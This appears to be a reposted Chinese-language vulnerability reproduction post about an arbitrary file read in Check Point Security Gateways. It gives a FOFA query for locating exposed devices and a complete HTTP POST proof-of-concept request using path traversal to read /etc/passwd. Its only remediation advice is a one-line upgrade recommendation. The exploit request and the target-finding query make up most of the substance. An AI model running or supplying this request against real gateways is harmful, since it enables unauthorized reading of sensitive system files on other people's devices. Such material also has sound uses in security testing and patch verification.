Check Point Security Gateways 任意文件读取

admin

109296
文章

90
评论

2024年6月4日23:49:38评论31 views字数 542阅读1分48秒阅读模式

漏洞描述

‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍CheckPoint Gateway‍是CheckPoint 的一个安全网关设备，攻击者可构造恶意请求遍历读取系统上的文件，造成敏感信息泄漏。

漏洞复现 || Check Point Security Gateways 任意文件读取

资产确定

fofa： app="Check_Point-SSL-Network-Extender"

漏洞复现

1.利用如下POC读取passwd

POST /clients/MyCRL HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeContent-Length: 39Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

aCSHELL/../../../../../../../etc/passwd

漏洞复现 || Check Point Security Gateways 任意文件读取

修复建议

1.升级至安全版本

如有侵权，请联系删除

原文始发于微信公众号（我爱林）：漏洞复现 || Check Point Security Gateways 任意文件读取

左青龙
微信扫一扫

右白虎
微信扫一扫

Check Point Security Gateways 任意文件读取

漏洞描述

资产确定

漏洞复现

修复建议

CVE-2024-34331：Parallels Repack 权限提升

【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)

GeoServer wfs接口处存在RCE漏洞(CVE-2024-36401)

用友 U8-cloud api_hr sql注入漏洞

GeoServer 任意命令执行漏洞 CVE-2024-36401

用友 GRP-U8 userInfoWeb sql注入

SpringBlade tents/list接口处存在SQL 注入漏洞

海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞

CVE-2024-24919漏洞复现 Poc

时空智友 ERP uploadstudiofile 文件上传POC

发表评论

在线咨询

微信